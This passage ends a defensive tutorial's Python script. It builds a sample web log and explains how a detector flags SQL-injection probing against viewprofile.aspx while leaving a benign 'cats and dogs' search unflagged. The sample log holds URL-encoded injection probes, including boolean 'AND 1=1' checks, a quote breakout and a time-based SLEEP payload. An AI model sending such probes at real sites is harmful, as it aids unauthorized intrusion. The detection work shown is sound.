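# Constructed sample log: one scanner-like source probing viewprofile.aspx,
# one ordinary visitor whose search text happens to contain the word "and".
SAMPLE_LOG = [
    '10.10.10.5 - - [12/Mar/2021:10:15:01 +0000] "GET /viewprofile.aspx?id=1 HTTP/1.1" 200 5120',
    '10.10.10.5 - - [12/Mar/2021:10:15:02 +0000] "GET /viewprofile.aspx?id=1%20AND%201=1 HTTP/1.1" 200 5120',
    '10.10.10.5 - - [12/Mar/2021:10:15:02 +0000] "GET /viewprofile.aspx?id=1%20AND%201=2 HTTP/1.1" 200 3012',
    '10.10.10.5 - - [12/Mar/2021:10:15:03 +0000] "GET /viewprofile.aspx?id=1%27%20AND%20%271%27%3D%271 HTTP/1.1" 500 412',
    '10.10.10.5 - - [12/Mar/2021:10:15:04 +0000] "GET /viewprofile.aspx?id=1%20AND%20SLEEP(5)-- HTTP/1.1" 200 5120',
    '10.10.10.9 - - [12/Mar/2021:10:16:00 +0000] "GET /search.aspx?q=cats%20and%20dogs HTTP/1.1" 200 2210',
    '10.10.10.9 - - [12/Mar/2021:10:16:05 +0000] "GET /viewprofile.aspx?id=2 HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    counts, alerts = analyze(SAMPLE_LOG)
    for (ip, endpoint), info in alerts.items():
        print(f"{ip} -> {endpoint}: {info['requests']} flagged requests, "
              f"response sizes {sorted(info['sizes'])}")
        for p in info["payloads"]:
            print("   ", p)
```

On the sample log the scanner-like source is reported once, with four flagged requests against /viewprofile.aspx and three different response sizes, while the visitor searching for "cats and dogs" is not flagged because the boolean pattern requires a numeric comparison or a quote breakout. The indicator list is deliberately short; in production, a web application firewall or a dedicated ruleset would replace it, and the per-source, per-endpoint counting with a response-size spread is the part worth keeping as a correlation rule in the SIEM.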
